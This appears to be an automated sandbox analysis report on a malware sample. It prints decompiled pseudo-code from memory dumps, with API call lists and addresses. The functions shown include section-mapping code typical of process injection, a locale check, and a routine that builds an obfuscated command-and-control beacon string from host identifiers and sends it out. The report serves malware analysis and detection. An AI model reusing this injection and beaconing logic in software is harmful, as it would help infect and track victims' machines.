                                                                                                                                                                                                                                                                                    • API String ID: 2575439697-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5899515d0a300da4b1869a59de47dac7e5a9c3da987ce320648997bd6c2d99aa
                                                                                                                                                                                                                                                                                    • Instruction ID: 9e055ab9cd2ccfbb5d1e06bb0fda447e92fb22fe9e6573bb4ef6c5e2508339fa
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5899515d0a300da4b1869a59de47dac7e5a9c3da987ce320648997bd6c2d99aa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 572103B2900218BBDF11DFA5CD45ADEBFBDEB08740F108026F909E6120D7B18A55DBA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                                                                    			E6E0518D1(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                                                                                                    				int _v44;
                                                                                                                                                                                                                                                                                    				void* _v48;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t48;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t48 = __eax;
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v48 = 0x18;
                                                                                                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                                                                                                    				_v36 = 0x40;
                                                                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                                                                                                                    				if(_t34 < 0) {
                                                                                                                                                                                                                                                                                    					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					 *_t48 = _v16;
                                                                                                                                                                                                                                                                                    					_t39 = E6E051B89(_t48,  &_v12); // executed
                                                                                                                                                                                                                                                                                    					_t47 = _t39;
                                                                                                                                                                                                                                                                                    					if(_t47 != 0) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						memset(_v12, 0, _v24);
                                                                                                                                                                                                                                                                                    						 *_a4 = _v12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t47;
                                                                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6E05192E
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051B89: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E051943,00000002,00000000,?,?,00000000,?,?,6E051943,00000000), ref: 6E051BB6
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 6E051950
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                    • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                    			E6E051566(void* __ecx) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				signed short _t7;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
                                                                                                                                                                                                                                                                                    				if(_t7 == 0) {
                                                                                                                                                                                                                                                                                    					__imp__GetSystemDefaultUILanguage();
                                                                                                                                                                                                                                                                                    					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E05157B
                                                                                                                                                                                                                                                                                    • GetSystemDefaultUILanguage.KERNEL32(?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051585
                                                                                                                                                                                                                                                                                    • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051598
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3724080410-0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E6E051B89(void** __esi, PVOID* _a4) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                                                                                                                    				if(_t13 < 0) {
                                                                                                                                                                                                                                                                                    					_push(_t13);
                                                                                                                                                                                                                                                                                    					return __esi[6]();
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E051943,00000002,00000000,?,?,00000000,?,?,6E051943,00000000), ref: 6E051BB6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: SectionView
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1323581903-0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                                                                    			E00A76DB7(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				void* __edi;
long _t63;
intOrPtr _t64;
intOrPtr _t65;
intOrPtr _t66;
intOrPtr _t67;
intOrPtr _t68;
void* _t71;
intOrPtr _t72;
int _t75;
void* _t76;
intOrPtr _t77;
intOrPtr _t81;
intOrPtr _t85;
intOrPtr _t86;
void* _t88;
void* _t91;
intOrPtr _t95;
intOrPtr _t99;
intOrPtr* _t101;
void* _t102;
void* _t107;
intOrPtr _t112;
signed int _t116;
char** _t118;
int _t121;
signed int _t123;
intOrPtr* _t124;
intOrPtr* _t126;
intOrPtr* _t128;
intOrPtr* _t130;
intOrPtr _t133;
intOrPtr _t136;
int _t139;
intOrPtr _t140;
int _t143;
void* _t144;
void* _t145;
void* _t155;
int _t158;
void* _t159;
void* _t160;
void* _t161;
intOrPtr _t162;
void* _t164;
long _t168;
intOrPtr* _t169;
intOrPtr* _t172;
void* _t173;
void* _t175;
void* _t176;
void* _t181;

_t155 = __edx;
_t145 = __ecx;
_t63 = __eax;
_t144 = _a20;
_a20 = 8;
if(__eax == 0) {
	_t63 = GetTickCount();
}
_t64 =  *0xa7a018; // 0x785c6176
asm("bswap eax");
_t65 =  *0xa7a014; // 0x5cb11ae7
asm("bswap eax");
_t66 =  *0xa7a010; // 0x15dc9586
asm("bswap eax");
_t67 =  *0xa7a00c; // 0x67522d90
asm("bswap eax");
_t68 =  *0xa7a2d0; // 0x4aed5a8
_t3 = _t68 + 0xa7b622; // 0x74666f73
_t158 = wsprintfA(_t144, _t3, 3, 0x3d14c, _t67, _t66, _t65, _t64,  *0xa7a02c,  *0xa7a004, _t63);
_t71 = E00A7271A();
_t72 =  *0xa7a2d0; // 0x4aed5a8
_t4 = _t72 + 0xa7b662; // 0x74707526
_t75 = wsprintfA(_t158 + _t144, _t4, _t71);
_t175 = _t173 + 0x38;
_t159 = _t158 + _t75;
if(_a8 != 0) {
	_t140 =  *0xa7a2d0; // 0x4aed5a8
	_t8 = _t140 + 0xa7b66d; // 0x732526
	_t143 = wsprintfA(_t159 + _t144, _t8, _a8);
	_t175 = _t175 + 0xc;
	_t159 = _t159 + _t143;
}
_t76 = E00A72956(_t145);
_t77 =  *0xa7a2d0; // 0x4aed5a8
_t10 = _t77 + 0xa7b38a; // 0x6d697426
_t160 = _t159 + wsprintfA(_t159 + _t144, _t10, _t76, _t155);
_t81 =  *0xa7a2d0; // 0x4aed5a8
_t12 = _t81 + 0xa7b7b4; // 0x5568d5c
_t181 = _a4 - _t12;
_t14 = _t81 + 0xa7b33b; // 0x74636126
_t157 = 0 | _t181 == 0x00000000;
_t161 = _t160 + wsprintfA(_t160 + _t144, _t14, _t181 == 0);
_t85 =  *0xa7a318; // 0x55695e0
_t176 = _t175 + 0x1c;
if(_t85 != 0) {
	_t136 =  *0xa7a2d0; // 0x4aed5a8
	_t18 = _t136 + 0xa7b8ea; // 0x3d736f26
	_t139 = wsprintfA(_t161 + _t144, _t18, _t85);
	_t176 = _t176 + 0xc;
	_t161 = _t161 + _t139;
}
_t86 =  *0xa7a328; // 0x55695b0
if(_t86 != 0) {
	_t133 =  *0xa7a2d0; // 0x4aed5a8
	_t20 = _t133 + 0xa7b685; // 0x73797326
	wsprintfA(_t161 + _t144, _t20, _t86);
	_t176 = _t176 + 0xc;
}
_t162 =  *0xa7a37c; // 0x5569630
_t88 = E00A75741(0xa7a00a, _t162 + 4);
_t168 = 0;
_v12 = _t88;
if(_t88 == 0) {
	L28:
	RtlFreeHeap( *0xa7a290, _t168, _t144); // executed
	return _a20;
} else {
	_t91 = RtlAllocateHeap( *0xa7a290, 0, 0x800);
                                                                                                                                                                                                                                                                                    					_a8 = _t91;
                                                                                                                                                                                                                                                                                    					if(_t91 == 0) {
                                                                                                                                                                                                                                                                                    						L27:
                                                                                                                                                                                                                                                                                    						HeapFree( *0xa7a290, _t168, _v12);
                                                                                                                                                                                                                                                                                    						goto L28;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00A71A51(GetTickCount());
                                                                                                                                                                                                                                                                                    					_t95 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    					__imp__(_t95 + 0x40);
                                                                                                                                                                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                                    					_t99 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    					__imp__(_t99 + 0x40);
                                                                                                                                                                                                                                                                                    					_t101 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    					_t102 = E00A75AE3(1, _t157, _t144,  *_t101); // executed
                                                                                                                                                                                                                                                                                    					_t164 = _t102;
                                                                                                                                                                                                                                                                                    					_v20 = _t164;
                                                                                                                                                                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                                    					if(_t164 == 0) {
                                                                                                                                                                                                                                                                                    						L26:
                                                                                                                                                                                                                                                                                    						RtlFreeHeap( *0xa7a290, _t168, _a8); // executed
                                                                                                                                                                                                                                                                                    						goto L27;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					StrTrimA(_t164, 0xa792cc);
                                                                                                                                                                                                                                                                                    					_push(_t164);
                                                                                                                                                                                                                                                                                    					_t107 = E00A72829();
                                                                                                                                                                                                                                                                                    					_v8 = _t107;
                                                                                                                                                                                                                                                                                    					if(_t107 == 0) {
                                                                                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                                                                                    						RtlFreeHeap( *0xa7a290, _t168, _t164); // executed
                                                                                                                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					 *_t164 = 0;
                                                                                                                                                                                                                                                                                    					__imp__(_a8, _v12);
                                                                                                                                                                                                                                                                                    					_t169 = __imp__;
                                                                                                                                                                                                                                                                                    					 *_t169(_a8, _v8);
                                                                                                                                                                                                                                                                                    					 *_t169(_a8, _t164);
                                                                                                                                                                                                                                                                                    					_t112 = E00A733FA(0, _a8);
                                                                                                                                                                                                                                                                                    					_a4 = _t112;
                                                                                                                                                                                                                                                                                    					if(_t112 == 0) {
                                                                                                                                                                                                                                                                                    						_a20 = 8;
                                                                                                                                                                                                                                                                                    						L23:
                                                                                                                                                                                                                                                                                    						E00A72813();
                                                                                                                                                                                                                                                                                    						L24:
                                                                                                                                                                                                                                                                                    						RtlFreeHeap( *0xa7a290, 0, _v8); // executed
                                                                                                                                                                                                                                                                                    						_t168 = 0;
                                                                                                                                                                                                                                                                                    						goto L25;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t116 = E00A75C63(_t144, 0xffffffffffffffff, _t164,  &_v16); // executed
                                                                                                                                                                                                                                                                                    					_a20 = _t116;
                                                                                                                                                                                                                                                                                    					if(_t116 == 0) {
                                                                                                                                                                                                                                                                                    						_t172 = _v16;
                                                                                                                                                                                                                                                                                    						_t123 = E00A71671(_t172, _a4, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                    						_a20 = _t123;
                                                                                                                                                                                                                                                                                    						_t124 =  *((intOrPtr*)(_t172 + 8));
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t124 + 0x80))(_t124);
                                                                                                                                                                                                                                                                                    						_t126 =  *((intOrPtr*)(_t172 + 8));
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                                                                                                                                                                                                                                                    						_t128 =  *((intOrPtr*)(_t172 + 4));
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t128 + 8))(_t128);
                                                                                                                                                                                                                                                                                    						_t130 =  *_t172;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t130 + 8))(_t130);
                                                                                                                                                                                                                                                                                    						E00A72A03(_t172);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_a20 != 0x10d2) {
                                                                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                                                                    						if(_a20 == 0) {
                                                                                                                                                                                                                                                                                    							_t118 = _a12;
                                                                                                                                                                                                                                                                                    							if(_t118 != 0) {
                                                                                                                                                                                                                                                                                    								_t165 =  *_t118;
                                                                                                                                                                                                                                                                                    								_t170 =  *_a16;
                                                                                                                                                                                                                                                                                    								wcstombs( *_t118,  *_t118,  *_a16);
                                                                                                                                                                                                                                                                                    								_t121 = E00A76459(_t165, _t165, _t170 >> 1);
                                                                                                                                                                                                                                                                                    								_t164 = _v20;
                                                                                                                                                                                                                                                                                    								 *_a16 = _t121;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                                                                                                    							E00A72A03(_a4);
                                                                                                                                                                                                                                                                                    							if(_a20 == 0 || _a20 == 0x10d2) {
                                                                                                                                                                                                                                                                                    								goto L24;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								goto L23;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_a20 = _a20 & 0x00000000;
                                                                                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                                                                    0x00a76e04
                                                                                                                                                                                                                                                                                    0x00a76e07
                                                                                                                                                                                                                                                                                    0x00a76e13
                                                                                                                                                                                                                                                                                    0x00a76e20
                                                                                                                                                                                                                                                                                    0x00a76e22
                                                                                                                                                                                                                                                                                    0x00a76e28
                                                                                                                                                                                                                                                                                    0x00a76e2d
                                                                                                                                                                                                                                                                                    0x00a76e38
                                                                                                                                                                                                                                                                                    0x00a76e3a
                                                                                                                                                                                                                                                                                    0x00a76e3d
                                                                                                                                                                                                                                                                                    0x00a76e43
                                                                                                                                                                                                                                                                                    0x00a76e45
                                                                                                                                                                                                                                                                                    0x00a76e4d
                                                                                                                                                                                                                                                                                    0x00a76e58
                                                                                                                                                                                                                                                                                    0x00a76e5a
                                                                                                                                                                                                                                                                                    0x00a76e5d
                                                                                                                                                                                                                                                                                    0x00a76e5d
                                                                                                                                                                                                                                                                                    0x00a76e5f
                                                                                                                                                                                                                                                                                    0x00a76e66
                                                                                                                                                                                                                                                                                    0x00a76e6b
                                                                                                                                                                                                                                                                                    0x00a76e78
                                                                                                                                                                                                                                                                                    0x00a76e7a
                                                                                                                                                                                                                                                                                    0x00a76e7f
                                                                                                                                                                                                                                                                                    0x00a76e87
                                                                                                                                                                                                                                                                                    0x00a76e8a
                                                                                                                                                                                                                                                                                    0x00a76e90
                                                                                                                                                                                                                                                                                    0x00a76e9b
                                                                                                                                                                                                                                                                                    0x00a76e9d
                                                                                                                                                                                                                                                                                    0x00a76ea2
                                                                                                                                                                                                                                                                                    0x00a76ea7
                                                                                                                                                                                                                                                                                    0x00a76eaa
                                                                                                                                                                                                                                                                                    0x00a76eaf
                                                                                                                                                                                                                                                                                    0x00a76eba
                                                                                                                                                                                                                                                                                    0x00a76ebc
                                                                                                                                                                                                                                                                                    0x00a76ebf
                                                                                                                                                                                                                                                                                    0x00a76ebf
                                                                                                                                                                                                                                                                                    0x00a76ec1
                                                                                                                                                                                                                                                                                    0x00a76ec8
                                                                                                                                                                                                                                                                                    0x00a76ecb
                                                                                                                                                                                                                                                                                    0x00a76ed0
                                                                                                                                                                                                                                                                                    0x00a76eda
                                                                                                                                                                                                                                                                                    0x00a76edc
                                                                                                                                                                                                                                                                                    0x00a76edc
                                                                                                                                                                                                                                                                                    0x00a76edf
                                                                                                                                                                                                                                                                                    0x00a76eed
                                                                                                                                                                                                                                                                                    0x00a76ef2
                                                                                                                                                                                                                                                                                    0x00a76ef6
                                                                                                                                                                                                                                                                                    0x00a76ef9
                                                                                                                                                                                                                                                                                    0x00a770c5
                                                                                                                                                                                                                                                                                    0x00a770cd
                                                                                                                                                                                                                                                                                    0x00a770da
                                                                                                                                                                                                                                                                                    0x00a76eff
                                                                                                                                                                                                                                                                                    0x00a76f0b
                                                                                                                                                                                                                                                                                    0x00a76f13
                                                                                                                                                                                                                                                                                    0x00a76f16
                                                                                                                                                                                                                                                                                    0x00a770b5
                                                                                                                                                                                                                                                                                    0x00a770bf
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a770bf
                                                                                                                                                                                                                                                                                    0x00a76f22
                                                                                                                                                                                                                                                                                    0x00a76f27
                                                                                                                                                                                                                                                                                    0x00a76f30
                                                                                                                                                                                                                                                                                    0x00a76f41
                                                                                                                                                                                                                                                                                    0x00a76f45
                                                                                                                                                                                                                                                                                    0x00a76f4e
                                                                                                                                                                                                                                                                                    0x00a76f54
                                                                                                                                                                                                                                                                                    0x00a76f5c
                                                                                                                                                                                                                                                                                    0x00a76f61
                                                                                                                                                                                                                                                                                    0x00a76f68
                                                                                                                                                                                                                                                                                    0x00a76f71
                                                                                                                                                                                                                                                                                    0x00a76f77
                                                                                                                                                                                                                                                                                    0x00a770a5
                                                                                                                                                                                                                                                                                    0x00a770af
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a770af
                                                                                                                                                                                                                                                                                    0x00a76f83
                                                                                                                                                                                                                                                                                    0x00a76f89
                                                                                                                                                                                                                                                                                    0x00a76f8a
                                                                                                                                                                                                                                                                                    0x00a76f91
                                                                                                                                                                                                                                                                                    0x00a76f94
                                                                                                                                                                                                                                                                                    0x00a77097
                                                                                                                                                                                                                                                                                    0x00a7709f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a7709f
                                                                                                                                                                                                                                                                                    0x00a76f9d
                                                                                                                                                                                                                                                                                    0x00a76fa3
                                                                                                                                                                                                                                                                                    0x00a76fac
                                                                                                                                                                                                                                                                                    0x00a76fb5
                                                                                                                                                                                                                                                                                    0x00a76fbb
                                                                                                                                                                                                                                                                                    0x00a76fc2
                                                                                                                                                                                                                                                                                    0x00a76fc9
                                                                                                                                                                                                                                                                                    0x00a76fcc
                                                                                                                                                                                                                                                                                    0x00a770dd
                                                                                                                                                                                                                                                                                    0x00a7707f
                                                                                                                                                                                                                                                                                    0x00a7707f
                                                                                                                                                                                                                                                                                    0x00a77084
                                                                                                                                                                                                                                                                                    0x00a7708f
                                                                                                                                                                                                                                                                                    0x00a77095

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00A76DCE
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76E1B
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76E38
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76E58
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76E76
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76E99
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76EBA
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00A76EDA
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A76F0B
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00A76F1C
                                                                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(055695F0), ref: 00A76F30
                                                                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(055695F0), ref: 00A76F4E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B0E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75AE3: lstrlen.KERNEL32(00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B16
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75AE3: strcpy.NTDLL ref: 00A75B2D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00A75B38
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A75B55
                                                                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,00A792CC,?,05569630), ref: 00A76F83
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72829: lstrlen.KERNEL32(0556887A,00000000,00000000,00000000,00A76328,00000000), ref: 00A72839
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72829: lstrlen.KERNEL32(?), ref: 00A72841
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72829: lstrcpy.KERNEL32(00000000,0556887A), ref: 00A72855
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72829: lstrcat.KERNEL32(00000000,?), ref: 00A72860
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00A76FA3
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 00A76FB5
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00A76FBB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A733FA: lstrlen.KERNEL32(?,00A7A380,73BB7FC0,00000000,00A72788,?,?,?,?,?,00A73EAC,?), ref: 00A73403
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A733FA: mbstowcs.NTDLL ref: 00A7342A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A733FA: memset.NTDLL ref: 00A7343C
                                                                                                                                                                                                                                                                                    • wcstombs.NTDLL ref: 00A7704E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71671: SysAllocString.OLEAUT32(00000000), ref: 00A716B2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71671: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00A71734
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71671: StrStrIW.SHLWAPI(00000000,006E0069), ref: 00A71773
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72A03: HeapFree.KERNEL32(00000000,00000000,00A74072,00000000,?,?,00000000,?,?,?,?,?,?,00A744AE,00000000), ref: 00A72A0F
                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 00A7708F
                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00A7709F
                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,05569630), ref: 00A770AF
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 00A770BF
                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?), ref: 00A770CD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
